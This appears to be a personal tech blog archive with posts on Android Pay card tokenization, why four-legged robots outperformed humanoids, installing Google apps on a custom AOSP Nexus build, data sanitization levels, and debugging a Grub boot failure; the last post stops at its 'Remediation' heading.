Before I reveal my next speculation, a bit of background is necessary. Something which you must understand is that in card processing, time is of the essence. A transaction must be processed in a matter of seconds in order for the customer to be satisfied. In these few seconds, the transaction has to pass through multiple parties. In the case of the traditional card, there's the point-of-sale terminal which swipes the card, some back-end system for managing these terminals, the credit card processor (such as Visa), and the bank (such as JPMorgan Chase). The transaction has to pass through all these parties in order to be allowed.

With that understood, I tease my next speculation with a question: Who translates the virtual number into the real number? Surely this translation must happen somewhere, otherwise why would the Android Pay user provide a credit or debit card number in the first place? I speculate that it isn't Google.

Think about it. If Google were translating the virtual number into the real number at the time of use, the process would become transparent to the banks. There would be no reason for Google to solicit partnership with them. But we know Android Pay isn't transparent to the banks, which is a strong reason to speculate that this is not the case. Google likely shares the virtual number with the bank at some point during the process of adding or verifying the card.

Handling the virtual number in this manner benefits both parties. First, this decreases the bank's risk because if the translation isn't handled by Google, then Google won't have to send the real number over the wire to the next party in the processing chain. This benefits Google as well because no translating on their end means no need to build out any infrastructure. They can piggyback off the existing card processing infrastructure.
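
To make the speculation concrete, here is a toy model of a party (the bank or the card processor, whichever it turns out to be) that holds the mapping from virtual numbers to real ones. Everything here is hypothetical: the `TokenVault` class, its method names, and the 16-digit format are assumptions for illustration and say nothing about how Android Pay is actually implemented.

```python
import secrets


class TokenVault:
    """Hypothetical holder of the virtual-to-real card number mapping."""

    def __init__(self):
        self._real_by_virtual = {}

    def enroll(self, real_number: str) -> str:
        """Issue a random virtual number for a real card (assumed 16 digits)."""
        virtual = "".join(secrets.choice("0123456789") for _ in range(16))
        self._real_by_virtual[virtual] = real_number
        return virtual

    def resolve(self, virtual: str):
        """Translate a virtual number back to the real one, or None if unknown."""
        return self._real_by_virtual.get(virtual)

    def reissue(self, compromised_virtual: str) -> str:
        """Retire a compromised virtual number and issue a fresh one.

        The real card number never changes, so no new card is needed.
        """
        real_number = self._real_by_virtual.pop(compromised_virtual)
        return self.enroll(real_number)


vault = TokenVault()
real = "4111111111111111"  # a well-known test card number, not a real account
virtual = vault.enroll(real)

# Only the vault can turn the virtual number back into the real one.
assert vault.resolve(virtual) == real

# After a compromise, the old virtual number stops working.
replacement = vault.reissue(virtual)
```

In this picture the phone and the retailer only ever handle `virtual`, which matches the risk argument above: a leak exposes a number that can be retired without reissuing the card.
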

Unanswered Questions

So who does the translation? If it isn't the retailer and it isn't Google, that leaves the bank and the card processor. Sadly, I don't have an answer to this question.

The other question I don't have an answer for is what is actually given to the retailer via NFC at the time of use. Is it simply the virtual number or is it something else?

These questions I leave to the reverse-engineers.

How Number of Limbs Relates to Robots and Organisms

2015-10-30T22:30:00-04:00

This weekend, DARPA hosted its large robotics challenge, in which semi-autonomous robots had to perform a series of tasks simulating a disaster relief scenario. Specifically, robots had to be able to open doors, shut off water valves, drill holes in walls, climb stairs and more. It was quite the spectacle to watch and while it was impressive to see how far robotics has come, it also served as a reminder of how far robotics still has to go. The robots were very slow at performing their tasks and there was plenty of falling over and unintended failures. Half the robots I observed couldn't even complete the first task of opening a normal door. In short, we can all rest easy knowing that these robots aren't going to be stealing our jobs or planning a violent uprising any time soon.

One other thing which the average observer may have noticed is that the four legged robots performed significantly better than the two legged humanoid robots. To many, the reasons may seem obvious; to others, less so. Even those who easily made sense of this outcome probably have not realized how consistent these results are with the biological organisms which inhabit our planet. With that in mind, I'd like to take a moment to write about locomotion and how it relates to both robots and biological organisms.

Locomotion in Biology

Take a moment to recall every organism you can which moves over land using limbs. Now think about how many limbs each of these organisms has which are primarily used for moving. Now think about the number of limbs again, but this time pay special attention to the size of the organism relative to its number of limbs. Do this long enough, and a pattern should start to emerge. Specifically, smaller organisms like bugs tend to have six or more limbs while larger organisms like mammals have four and humans have only two. Once again, we're only considering the limbs used primarily for moving.

Is there something special about two limbs versus four limbs versus six limbs with regards to locomotion? As it turns out, there is. Specifically, the ability for the organism to remain stable while moving or while stationary changes as its number of limbs changes.

Physics of Stability

But first, a bit of physics review. What does it mean for an organism which is standing on limbs to be stable or unstable? First, consider the limbs which are in contact with the ground. Now connect these limbs with imaginary lines to form an imaginary polygon on the ground beneath the organism. In order for an organism to be stable, the point on the ground directly below its center of gravity must be somewhere within this polygon. If that point leaves this area, the organism will start to tip over and, without corrective action, it will eventually topple over. So how does this relate back to having two, four, or six limbs?
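
The stability rule can be written down as a short check. The sketch below assumes the feet form a convex polygon and are listed in order around it, and it treats the center of gravity as a 2D point already projected onto the ground; the function name and the coordinates are made up for illustration.

```python
def is_statically_stable(feet, center_of_gravity):
    """Return True if the projected center of gravity lies strictly inside
    the polygon formed by the feet.

    feet: list of (x, y) ground contact points, in order around a convex polygon.
    center_of_gravity: (x, y) point on the ground below the center of gravity.
    """
    if len(feet) < 3:
        # One or two point contacts form a point or a line, not a polygon.
        return False

    cx, cy = center_of_gravity
    crosses = []
    for i in range(len(feet)):
        x1, y1 = feet[i]
        x2, y2 = feet[(i + 1) % len(feet)]
        # The sign of the cross product says which side of this edge the point is on.
        crosses.append((x2 - x1) * (cy - y1) - (y2 - y1) * (cx - x1))

    # Inside means the point is on the same side of every edge.
    return all(c > 0 for c in crosses) or all(c < 0 for c in crosses)


# Four feet on the ground forming a 2 x 1 rectangle.
four_feet = [(0, 0), (2, 0), (2, 1), (0, 1)]

centered = is_statically_stable(four_feet, (1, 0.5))       # inside the rectangle
leaning_out = is_statically_stable(four_feet, (3, 0.5))    # past the right edge
two_points = is_statically_stable([(0, 0), (2, 0)], (1, 0))  # only a line
```

Points that land exactly on an edge are treated as not stable here, since any small disturbance would tip the organism over that edge.
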

Six Limbed Organisms

First, consider the six limbed bug. When the bug is stationary, it is standing on all six limbs and stable. How about when it wants to move? To move, the bug can pick up, for example, its front right, back right, and middle left limbs. This leaves its front left, back left, and middle right limbs still on the ground, forming a tripod. As long as the bug keeps its center of gravity near the center of its body, this is a stable position. This means the bug is now free to move its lifted limbs forward and place them down. Placing them down creates another tripod which, in turn, stabilizes the bug so it can lift up and move the limbs which were previously grounded. By using this "alternating tripod" locomotion, the bug can move while always being stable. In other words, if I had a magic wand which could freeze the bug, I could freeze the bug at any point during its locomotion and it would not fall over. So to summarize, with six limbs an organism can be stable while stationary or while in motion.

Four Limbed Organisms

How about the four limbed organism? When it's stationary, it has four limbs on the ground, so again there is no problem with stability. But what about when it moves? Now there's a problem. With only four limbs, it cannot use the alternating tripod motion described earlier. It can still remain stable while in motion, but the motion would have to be very awkward. Specifically, the organism would have to shift its center of gravity to be within the right triangle formed by three of its limbs, move the now freed limb forward, and then shift its center of gravity over to the newly formed right triangle to free up another limb. This is possible, but now the organism is intentionally shifting its center of gravity as it moves, which is something the six limbed organism didn't have to concern itself with. So to summarize, the four limbed organism is stable while stationary and potentially stable while moving, but requires a more complicated locomotion.
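
The difference between the six and four limbed cases can be checked numerically. The sketch below uses made-up foot positions with the body centered at the origin, and a small helper that tests whether a point is strictly inside a triangle. It is an illustration of the argument, not a model of any real animal or robot.

```python
def strictly_inside(triangle, point):
    """Return True if point lies strictly inside the triangle (any vertex order)."""
    px, py = point
    crosses = []
    for i in range(3):
        x1, y1 = triangle[i]
        x2, y2 = triangle[(i + 1) % 3]
        crosses.append((x2 - x1) * (py - y1) - (y2 - y1) * (px - x1))
    return all(c > 0 for c in crosses) or all(c < 0 for c in crosses)


# Hypothetical foot positions (x, y); the body faces +y, centered at the origin.
HEXAPOD = {
    "front_left": (-1, 1), "front_right": (1, 1),
    "middle_left": (-1, 0), "middle_right": (1, 0),
    "back_left": (-1, -1), "back_right": (1, -1),
}
QUADRUPED = {
    "front_left": (-1, 1), "front_right": (1, 1),
    "back_left": (-1, -1), "back_right": (1, -1),
}
CENTER = (0, 0)

# The two alternating tripods both contain the body's center.
tripod_a = [HEXAPOD[k] for k in ("front_left", "middle_right", "back_left")]
tripod_b = [HEXAPOD[k] for k in ("front_right", "middle_left", "back_right")]
hexapod_always_stable = (
    strictly_inside(tripod_a, CENTER) and strictly_inside(tripod_b, CENTER)
)

# The quadruped lifts its front right limb without shifting its weight:
# the center now sits exactly on the edge of the remaining triangle.
three_feet = [QUADRUPED[k] for k in ("front_left", "back_left", "back_right")]
quadruped_centered_stable = strictly_inside(three_feet, CENTER)

# Shifting the center of gravity toward the grounded limbs restores stability.
quadruped_shifted_stable = strictly_inside(three_feet, (-0.4, -0.4))
```

With these positions the hexapod never needs to move its center of gravity, while the quadruped is only stable on three limbs after shifting its weight, which is the extra complexity described above.
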

Two Limbed Organisms

Which leaves us with the two limbed organism. This organism isn't very stable while standing or moving. The problem is that two limbs only form a line, not a polygon. So if each limb contacts the ground as only a single point, the organism will constantly be in a state of falling no matter where it shifts its center of gravity. To compensate for this, two limbed organisms have feet. Since the feet contact the ground at multiple points and not just one, the line now becomes a very narrow rectangle and stability can be achieved while standing. However, this rectangle is very narrow compared to the rectangles formed by the stationary four or six limbed organism. Consequently, if someone were to push each organism, the two limbed organism is much easier to knock over than the others. To state it more scientifically, while the four and six limbed organisms are in stable equilibrium when stationary, the two limbed organism is in unstable equilibrium. When disturbed by an outside force, the four and six limbed organisms tend to remain standing while the two limbed organism tends to start falling over.

Similarly to the four limbed organism, while it is possible for the two limbed organism to move without sacrificing stability, doing so results in a very awkward locomotion. The two limbed organism has to shift its center of gravity to be balanced on one foot so it can lift and move the other foot, and then its center of gravity has to be carefully shifted towards the newly placed foot, making sure that the center of gravity doesn't shift outside the narrow rectangle representing its stability. You can imagine how awkward and difficult this would be.

Complexity Versus Efficiency

So if having fewer than six limbs makes it difficult for an organism in motion to remain stable, why do any organisms have fewer than six limbs? As it turns out, being unstable isn't always a bad thing. If an organism is always stable, it has to do all its own work in order to move itself. On the other hand, if an organism is unstable, it can take advantage of gravity to do some of the work of moving for it.

Consider once again the two limbed organism. Specifically, consider a human since that's the two limbed organism we're all most familiar with. Again, I'm only considering limbs used for locomotion. Our primary form of locomotion is called walking, but if you think about it, walking is really nothing more than controlled falling. To walk forward, a person lifts their foot, shifts their center of gravity forward, and then catches themselves with their lifted foot as they fall. The forward momentum from that fall then allows the person to lift their other foot and catch themselves as they fall forward again. After the first step, a portion of the forward energy is being generated by momentum as a result of gravity and this is a portion of energy which no longer needs to be generated by the organism. The result is a much more efficient locomotion than if the organism had to generate all the energy itself.

The same notion applies to running for two and four limbed organisms. Once the organism is running, the energy needed to continue running is simply the energy needed to lift itself a few inches off the ground and then to catch itself when gravity pulls it back down. While the organism is in the part of its stride where all of its limbs are off the ground, it is using no energy while still moving forward. To summarize, instability allows for greater efficiency.

Conclusion

The takeaway from all this is that when it comes to locomotion, the number of limbs a system has results in a trade-off between complexity and efficiency. With more limbs, the system can be simpler because it's more stable. On the other hand, with fewer limbs the system can be more efficient, but it also becomes more complex as it has to now be aware of its momentum and center of gravity. This could be an explanation as to why simpler organisms like bugs tend to have many limbs while more complex organisms like mammals tend to have fewer.

So what does all this have to do with the DARPA robotics challenge? What I hope I demonstrated with this rant on locomotion is that it shouldn't come as a surprise that the four limbed robots outperformed the two limbed robots in this competition. For the engineers designing and building these robots, making a robot which is able to move on only two limbs adds a layer of complexity which the four limbed robots don't have to worry about. However, as the field of robotics advances, two limbed robots will ultimately be superior to four limbed robots on land, especially as efficiency becomes the leading concern.

Installing Google Play Services and Google Apps on Nexus AOSP

2015-10-30T22:30:00-04:00

I figured out how to get Google Play Services and all the basic Google apps onto a custom compiled AOSP image. It's kind of tricky, so I'll outline what I learned here. I specifically got it working on a Nexus 5 device using a modified version of Android 5.0.2, but these steps should hopefully work for all Nexus devices and most Android versions. This tutorial is broken up into 4 parts:

Part 1: Compiling a Custom Image

First, make sure you've downloaded the vendor drivers for your device: link

Once you've downloaded the appropriate files, unzip them. You should now have a bunch of script files. Place these script files in the root directory of your AOSP repository and run them.

Next, make sure you've loaded your sources and you're in the correct lunch for your device (for Nexus 5, this is hammerhead aka 20):

source build/envsetup.sh
lunch 20

If this is your first time doing a make with the vendor drivers, you need to clobber to make sure the drivers are compiled into the ROM:

make clobber

After that, make your ROM:

make

Part 2: Flashing Custom Image to a Nexus Device

First, reboot your device into fastboot. The hardware button sequence for your device can be found here: link

Once in fastboot, ensure that your bootloader is unlocked. You can look up how to do this online.

After that, check that your computer can detect your device. You should see it when you run the following command:

fastboot devices

If you can't see it, check your USB drivers and make sure you have Google's Nexus USB drivers if you're using a Nexus device.

Finally, flash the device:

fastboot -w flashall

Part 3: Flashing Recovery

At this point, you've compiled a custom image and flashed it to your device. The next goal is to install the standard Google apps (Google Play Services, Google Play, Gmail, etc.). Unfortunately, the default recovery doesn't work well with rooted devices. So before we can do that, we need to install a 3rd-party recovery.

First, reboot the device into fastboot. This can be done via adb:

adb reboot bootloader

Once in fastboot, we can flash the recovery partition with our custom recovery. I recommend twrp which can be found here: link

For Nexus 5, this version of twrp will work: link

fastboot flash recovery twrp-2.8.7.1-hammerhead.img

After that, reboot the device:

fastboot reboot

Part 4: Install Gapps

First, push a gapps archive onto your sd card. This can be downloaded from cyanogen's website: link

The website only shows which gapps package corresponds to which CyanogenMod version, not the equivalent AOSP version. From my experience, I believe this much to be true:

Android 5.1.0 <=> CM 12.1
Android 5.0.0, 5.0.1, 5.0.2 <=> CM 12

If you are using a different version of AOSP, you'll have to experiment and find the right version on your own. Note, you can always do a factory reset from recovery to remove gapps and then install another version.

Once you've downloaded a version of gapps, push it to the sd card:

adb push gapps.zip /sdcard/

Once the zip is written to the sd card, reboot into recovery:

adb reboot recovery

Once in the Recovery, select install from zip and select your zip. After the installation is complete, select the wipe button at the bottom of the screen and then reboot the device. If everything worked correctly, you should be prompted with the Welcome screen which will ask you to configure your device. If you do not get the Welcome screen, then you either didn't install the correct version of gapps or you forgot to wipe something.

Digital Versus Analog Sanitization

2015-10-28T22:30:00-04:00

As I promised in my previous blog post, I will try to explain the difference between digital and analog sanitization using an analogy better suited for the task. If you have no clue what I'm talking about, I recommend that you go and read that post. If you were hoping for the other follow-up I promised regarding a more practical guide to data protection, this is not that post. This is going to be another conceptual writing.

The Analogy

The analogy which I'm going to use to try to illustrate the difference between digital and analog sanitization might seem somewhat contrived, but it's the simplest one I could come up with so here it goes.

Imagine you have a collection of buckets which can each hold 4 cups of water. You are able to add and remove water from the buckets whenever you like, however, you must always try to add or remove 3 cups worth of water at a time. So if a bucket is empty and you add water to it, the bucket ends up with 3 cups worth of water in it. If you try to add water again to the same bucket, some water overflows and is lost so ultimately the bucket ends up with 4 cups worth of water in it. Similarly, if the bucket only has 1 cup of water in it and you try to remove water, you end up removing all the remaining water in the bucket.

Now here's the last piece regarding how this analogy works. Assume that we only care about answering the question of whether a particular bucket is more full or more empty. Therefore, if the bucket contains more than 2 cups of water, we will call it mostly full. Likewise, if it has less than 2 cups of water, we will consider it mostly empty. We don't have to worry about any bucket having exactly 2 cups of water in it given how this model works. In fact, it is only possible for any particular bucket to contain 0, 1, 3, or 4 cups of water, assuming all the buckets start empty.
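
The rules above are small enough to check mechanically. The following is a minimal Python sketch of the bucket model; the function names (add, remove, reachable_levels, is_mostly_full) are made up for illustration. It explores every level a bucket can reach from empty and confirms that only 0, 1, 3, and 4 cups are possible.

```python
CAPACITY = 4  # each bucket holds at most 4 cups
STEP = 3      # every add or remove tries to move 3 cups


def add(level):
    """Add water; anything above capacity overflows and is lost."""
    return min(level + STEP, CAPACITY)


def remove(level):
    """Remove water; a bucket cannot go below empty."""
    return max(level - STEP, 0)


def reachable_levels(start=0):
    """Explore every level reachable from `start` using add and remove."""
    seen, frontier = {start}, [start]
    while frontier:
        level = frontier.pop()
        for nxt in (add(level), remove(level)):
            if nxt not in seen:
                seen.add(nxt)
                frontier.append(nxt)
    return sorted(seen)


def is_mostly_full(level):
    """The two-state reading: more than 2 cups counts as mostly full."""
    return level > 2


print(reachable_levels())  # [0, 1, 3, 4]
```

Exactly 2 cups never shows up in the result, which is why the mostly full / mostly empty question always has a clear answer.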

Emptying the Buckets

So we have our buckets and some time has gone by and now all of our buckets contain different amounts of water. Some are mostly full while others are mostly empty. Now let's assume that we want to "wipe" all of our buckets. In other words, we want all our buckets to be mostly empty. The process is pretty easy: we can just go to every bucket and remove water from it. Simple, right?

While it is true that doing this will now cause all of our buckets to be mostly empty, take another look at how much water is actually in each bucket. The buckets which originally had 3 or fewer cups of water will now be empty, but the buckets which originally had 4 cups of water will still have 1 cup of water remaining. This means that if we inspect how much water is in each bucket, we can determine which ones previously held 4 cups of water. We can reconstruct a portion of the past state of the buckets from the current state of the buckets!

What Went Wrong?

In a nutshell, we were able to figure out the past state of some of the buckets because there is a correlation between the last state a bucket was in and its current state. This correlation occurred because when we emptied the buckets, we only considered the 2 possible digital states for a particular bucket and ignored the 4 possible analog states. If we had considered the analog states, we would have realized that we needed to empty each bucket twice in order to make it impossible to determine any bucket's previous state. This is an analogy for the difference between digital and analog sanitization.
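
To make the leak concrete, here is a small Python sketch (the helper names remove and wipe are made up for illustration) that wipes one bucket at each possible level, first with a single pass and then with two.

```python
def remove(level, step=3):
    """Try to remove `step` cups; a bucket cannot go below empty."""
    return max(level - step, 0)


def wipe(levels, passes):
    """Apply `passes` rounds of removal to every bucket."""
    for _ in range(passes):
        levels = [remove(level) for level in levels]
    return levels


before = [0, 1, 3, 4]        # one bucket at each possible analog level

after_one = wipe(before, 1)
print(after_one)             # [0, 0, 0, 1]

# Digitally every bucket now reads "mostly empty" ...
print([level > 2 for level in after_one])  # [False, False, False, False]

# ... but the leftover cup marks the bucket that used to hold 4 cups.
print([level == 1 for level in after_one])  # [False, False, False, True]

after_two = wipe(before, 2)
print(after_two)             # [0, 0, 0, 0]
```

After the second pass every bucket is at the same analog level, so nothing about the earlier state can be read back.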

Back to Reality

Although our simple analogy used buckets of water, this concept actually applies to electronic storage devices. For those of us with experience in the logical side of computing, such as any computer scientist who might happen to read this, we have a tendency to abstract away the gritty details about how the underlying hardware of a computer works. While utilizing this layer of abstraction simplifies our problems and makes them approachable, abstractions such as these can cause us to forget that our idealistic binary zeros and ones are actually being stored in physical materials. As every electrical engineer knows, these physical materials don't behave in accordance with our perfectly abstracted models. Instead, we have to take their infinite possible analog states and group them into the "zero" set and the "one" set in order to fit them to our models. Never forget, however, that at the end of the day the storage device is indeed physical and consequently analog. Correlations between states can exist, but become hidden underneath the veil of our abstractions.

So to end on a slightly more practical note, how do professionals deal with these analog correlations? What is the takeaway from all this? The short answer is that if you want to wipe an electronic storage device, but you can't simply destroy it, don't settle for "zeroing" out the data in 1 pass. Overwrite all the data with random values and do so multiple times. The more passes and the more entropy, the less likely it is that a correlation will remain between the original data and the current state of the device. How many passes are necessary depends on the particulars of the device, so if you need to wipe a computer, smartphone, or other electronic device, I recommend doing some research and selecting a professional tool to do the work for you. DBAN, for example, is a good one to consider.
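
As a rough illustration of "random values, multiple passes", the following Python sketch overwrites a single file in place. The function name overwrite_file and its defaults are made up for this example. It is a file-level sketch only: on SSDs, journaling or copy-on-write filesystems, and RAID setups the new bytes are not guaranteed to land on the same physical cells, so it is no substitute for a dedicated wiping tool.

```python
import os


def overwrite_file(path, passes=3, chunk_size=1 << 20):
    """Overwrite `path` in place with random bytes, `passes` times.

    Sketch only: this assumes the filesystem writes the new data over
    the old blocks, which many modern storage stacks do not guarantee.
    """
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            remaining = size
            while remaining > 0:
                n = min(chunk_size, remaining)
                f.write(os.urandom(n))  # fresh random data on every pass
                remaining -= n
            f.flush()
            os.fsync(f.fileno())        # push this pass out to the device


# Example (hypothetical file name):
# overwrite_file("old-tax-return.pdf", passes=3)
```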

Is your data really gone? Explaining the challenges of data wiping.

2015-10-24T22:30:00-04:00

Every now and again you hear on the news about some police investigation having a breakthrough by recovering deleted data off of an electronic device belonging to the possible suspect. You may also hear about professional criminals who recover sensitive information, such as credit card numbers, by sifting through the hard drives of old discarded computers.

How does this happen? How is it that data turns out to still be on the device even when the user consciously takes actions to delete it?

In this article, I'm going to be covering a conceptual topic which forms one of the cornerstones of a field known as digital forensics. Namely, what does it mean for data on an electronic device to be deleted and what does it take to restore this supposedly destroyed information?

Terminology

The first step to grasping what it means for data to be deleted is to understand that "deletion" can have multiple technical meanings which vary from the definition we use in everyday speech. Basically, there are different extents to which data can be deleted on an electronic device, and the extent we choose determines how difficult the data will be to recover.

Many publications already categorize the degrees of data sanitization. For example, NIST 800-88 (see Table 5.1) offers very generalized definitions of what the degrees of data sanitization are. However, since I want this article to be approachable to the layman, I'm going to use an alternative categorization used in many publications. If you're curious about how these two categorizations relate, the categorization I'm going to be using in this article fits into the Clear and Purge categories of NIST 800-88. Namely, I'm going to cover logical sanitization, cryptographical sanitization, digital sanitization, and analog sanitization.

Logical Sanitization

Logical sanitization is the weakest form of sanitization and the easiest to explain, so I'll cover it first using an analogy:

Imagine a particular file on your electronic device as being a house. In order to visit the house, you have to know how to get there. Luckily, the streets have signs at every intersection. By following the signs, you're able to find the house.

Now imagine that I take down all the signs. The house still exists, but now if you want to visit it, you'll have to search every street. This is what it means to logically sanitize data.

You can probably already see the shortcoming of this form of sanitization. Just because I take down the signs pointing to a piece of data doesn't mean that someone can't still find that data with enough effort.

Despite this fault, this is what actually happens in your electronic device when you normally delete a file. Your device doesn't actually delete the file itself; it just deletes its pointers to that file. This means that until a new file is written into the space the old file occupied, the old file can still be recovered. And since storage these days is large and most systems write new data randomly across the storage, that old file can remain there for a very long time.
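
A toy model can show the same thing in a few lines. The Python sketch below uses an invented ToyDisk class, not any real filesystem's layout: a file index (the street signs) sits next to the raw storage (the houses), and deleting a file only removes its index entry.

```python
class ToyDisk:
    """A toy storage device: raw bytes plus an index of where files live."""

    def __init__(self, size=64):
        self.blocks = bytearray(size)  # the raw storage (the houses)
        self.index = {}                # file name -> (offset, length): the signs
        self.next_free = 0

    def write(self, name, data):
        offset = self.next_free
        self.blocks[offset:offset + len(data)] = data
        self.index[name] = (offset, len(data))
        self.next_free += len(data)

    def read(self, name):
        offset, length = self.index[name]
        return bytes(self.blocks[offset:offset + length])

    def delete(self, name):
        # Logical sanitization: only the pointer is removed.
        del self.index[name]


disk = ToyDisk()
disk.write("card.txt", b"4111-1111")
disk.delete("card.txt")

print("card.txt" in disk.index)     # False: the file looks gone
print(b"4111-1111" in disk.blocks)  # True: the bytes are still on the disk
```

Anyone willing to scan the raw blocks, which is the equivalent of searching every street, can still find the data.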

So why do electronic devices delete data this way? Frankly, because it's the fastest method. Most users are more concerned about speed than security, so system developers design their systems to delete data in the fastest way possible.

Cryptographical Sanitization

Cryptographical sanitization is an alternative version of logical sanitization which offers a bit more protection against data recovery.

To explain the difference, consider the house analogy again, only this time, the house also has a gated wall surrounding it. Luckily, you have a piece of paper in your hand which contains the password to open the gate. Thanks to this paper, you're able to visit the house without problem.

Now if I want to prevent you from visiting the house, I don't need to take down all the street signs, I just need to destroy your piece of paper which contains the password to the gate. Destroying this piece of paper is analogous to cryptographical sanitization.

However, this too has its shortcomings. For example, what if you memorized the password or otherwise made a copy of the paper? Alternatively, what if the password is so short that you could simply guess it? These are two serious challenges for cryptographical sanitization.

Additionally, cryptographical sanitization is weakened by the fact that it is circular. For example, what if I destroyed the paper containing the password by logically sanitizing it? You could just recover the paper, as mentioned in the previous section, and then access the house. In other words, cryptographical sanitization is only as strong as the sanitization applied to the password. If we apply cryptographical sanitization to that as well, then as the philosophers would say, it's turtles all the way down.

Digital Sanitization

Now we reach the stronger techniques for sanitizing data. Both of the two remaining techniques resort to destroying the house, but differentiating between the two can be difficult for the non-technical reader. For this reason, I'm going to keep my explanation brief and stick to the house analogy I've been using up to this point, even though doing so will introduce some vagueness. If you're interested in really understanding the difference between digital and analog sanitization, I plan to write a later article dedicated to this distinction using a different analogy better suited to the task.

Continuing along with the house analogy, digital sanitization is comparable to me taking a bulldozer, leveling the house, and then throwing the pieces into a dumpster and taking that dumpster with me. Now you cannot visit the house because the house simply doesn't exist.

Or can you?

As it turns out, there is still information about the house left behind! For example, you might study the depression in the ground left behind after the house was removed. Based on its size and depth, you might be able to approximate the house's dimensions; even though the house no longer exists. In fact, and this is where the house analogy breaks down, if you know enough about the construction of houses similar to the one that was destroyed, it is actually possible to reconstruct a perfect copy of the original house!

Analog Sanitization

Finally, at least in the scope of this article, we get to analog sanitization. As you've probably anticipated by now, this is the strongest of the four sanitization techniques covered in this article. Using the house analogy, this would be comparable to me not only destroying the house, but then also digging up the dirt on the property and replacing it with new dirt and leveling it. Now there are no remaining indicators that a house ever existed at any time in that spot, so there is nothing left from which to reconstruct a replica house. The data is truly gone at this point, so long as I have indeed destroyed every trace of the original house and the impact it had on its environment. That's a pretty big conditional claim I just made, but I'll leave it at that.

Afterword

This article ended up becoming more conceptual than I originally intended, but I hope the analogy was able to make the concepts I covered approachable. As mentioned, I hope to at some point write a follow-up article using another analogy which can better explain the difference between digital and analog sanitization. I also hope to in the future write an article to serve as the practical counterpart to this article for those who would like to know more about how to securely delete the data from their electronic devices.

The importance of boot partitions in Linux systems.

2015-10-20T22:30:00-04:00

Over the weekend, the lab I work in experienced a power outage. After power was restored, one of our servers failed to boot. It ultimately became my responsibility to figure out if the server could be repaired and failure wasn't an option because the server was configured (with no backups) to run a bunch of services and hosted lots of data (with no backups) for many users. Typical sysop problem (lol), but our lab has no personnel for managing the systems; so there I was.

In the process of finding and fixing the issue, I learned a lot of specifics regarding how the Grub bootloader and Linux work during system boot, so I decided to document my experience for future reference by others. This documentation will be lengthy, so if you only care about avoiding this type of problem, skip ahead to the Remediation section.

Finding the Problem

The server in question was a Dell PowerEdge T620 running Ubuntu. The server consisted of two Intel Xeon processors, about 128GB of RAM, and three 2TB hard drives connected to a RAID controller.

The problem occurred during system start-up. The BIOS would start Grub, and then Grub would produce the error "error: attempt to read or write outside of disk hd0". After that, the Linux kernel would start, but shortly after would spit out a stack trace and crash.

My first response was to run a disk check on the hard drives to make sure there weren't any problems with their sectors, but this turned up nothing. The disks were operating normally. This meant that the problem was most likely related to Grub.

Diagnosing the Problem

Since the error message that was appearing was being generated by Grub, the next thing I did was try to manually start the Linux kernel. The easiest way to do this is to press 'c' when the Grub menu appears. This will start a Grub command shell through which operating systems can be manually booted.

Understanding Partitions

Before explaining the commands I used while in the Grub command shell, I'll summarize some basics regarding partitions here.

First, hard drives and their partitions can be accessed in Linux via the "/dev" directory. In most modern Linux systems, hard drives follow a naming convention which starts with "sd" followed by a letter designating the drive: "sda", "sdb", "sdc", etc. Partition names consist of a hard drive name followed by a number. The hard drive "sda", for example, might have the partitions "sda1", "sda2", and so forth in the "/dev" directory.

Grub also uses the notion of disks and partitions, but the naming syntax is a little different. The syntax takes the form of "hd#,#" where the first # represents the disk number and the second # represents the partition on that disk. So "hd0,1", "hd0,2", and so on.
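
The relationship between the two naming schemes can be sketched as a small Python helper. The function linux_to_grub is made up for illustration and rests on two assumptions: Grub 2 numbering (disks counted from 0, partitions from 1, as in the "hd0,1" examples above), and the BIOS presenting the disks in the same order Linux names them, which is not guaranteed on every machine.

```python
import re


def linux_to_grub(device):
    """Translate a Linux name such as 'sda1' into Grub's 'hd#,#' form.

    Assumes Grub 2 numbering and that Grub sees the disks in the same
    order as Linux; treat the result as a first guess to confirm with ls.
    """
    match = re.fullmatch(r"sd([a-z])(\d+)", device)
    if match is None:
        raise ValueError(f"not an sdXN partition name: {device!r}")
    disk_number = ord(match.group(1)) - ord("a")  # sda -> 0, sdb -> 1, ...
    partition_number = int(match.group(2))        # partitions count from 1
    return f"hd{disk_number},{partition_number}"


print(linux_to_grub("sda1"))  # hd0,1
print(linux_to_grub("sdb3"))  # hd1,3
```

Listing the candidate partition from the Grub shell remains the reliable way to confirm the guess.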

Boot Sequence

While I'm covering general Linux background knowledge, I'll also mention a portion of the boot sequence for Linux because this will also be important for understanding the Grub commands. In most Linux systems which boot using the BIOS (as opposed to newer EFI or UEFI booting) the critical pieces are: BIOS, Grub, initrd, and vmlinux.

BIOS stands for Basic Input/Output System and is the first thing the system executes upon receiving power. Once the BIOS has started, it performs some basic system checks and then loads and executes the bootloader. There are many bootloaders out there, but Linux systems tend to use a particular one called Grub. Grub's job is to load the pieces into memory that are necessary to start the operating system. In the case of Linux, the two important pieces which Grub needs to load into memory are vmlinux and initrd. I won't discuss these files in great detail, but to explain them briefly, vmlinux is the Linux kernel image (Ubuntu ships it compressed under the name vmlinuz) and initrd is the initial RAM disk. The initial RAM disk is a minimal temporary root filesystem containing only the drivers and essential programs the kernel needs to find and mount the real root filesystem. Grub loads both files into memory and hands control to the kernel, which unpacks initrd and runs the early start-up scripts inside it. Once the real root filesystem is mounted, the system switches over to it and the memory used by initrd is released.

Diagnosing Grub

Now that I've covered all the necessary background information, on to the Grub commands.

The first step is to find where the boot directory is on the system. First, list all the partitions on the system:

grub> ls

This will create a list of all the partitions on the system. The next step is to figure out which one contains Grub, initrd, and vmlinux (since we're trying to boot a Linux operating system). This can also be done with the list command:

grub> ls (hd0,1)
grub> ls (hd0,1)/boot

Once we've found the location of the boot files, set that partition as Grub's root directory:

grub> set root=(hd0,1)

I used "hd0,1" in the above commands, but you might find the boot files in a different partition. Either way, the boot files for a Linux system should always be either in the root directory of the partition (if that partition is a standalone boot partition) or in "/boot" (if that partition also holds other files).

After we've found the correct root partition, we next need to give Grub the names of the vmlinux and initrd files:

grub> linux /boot/vmlinux root=/dev/sda1
grub> initrd /boot/initrd

Note, the linux command, which loads the vmlinux file, needs to be passed the parameter "root". This parameter should be the partition which holds the Linux operating system. This may or may not be the same partition holding the boot files.

Once all the files have been specified, all that's left is to boot the operating system:

grub> boot

At this point, you'll get a basic command shell for Linux. Of course, our lab's server was failing to boot, so this didn't happen. Instead, the error mentioned at the beginning appeared when I tried to execute the initrd command. Because of this, I knew that initrd was the problematic file. So how do we fix this?

Remediation

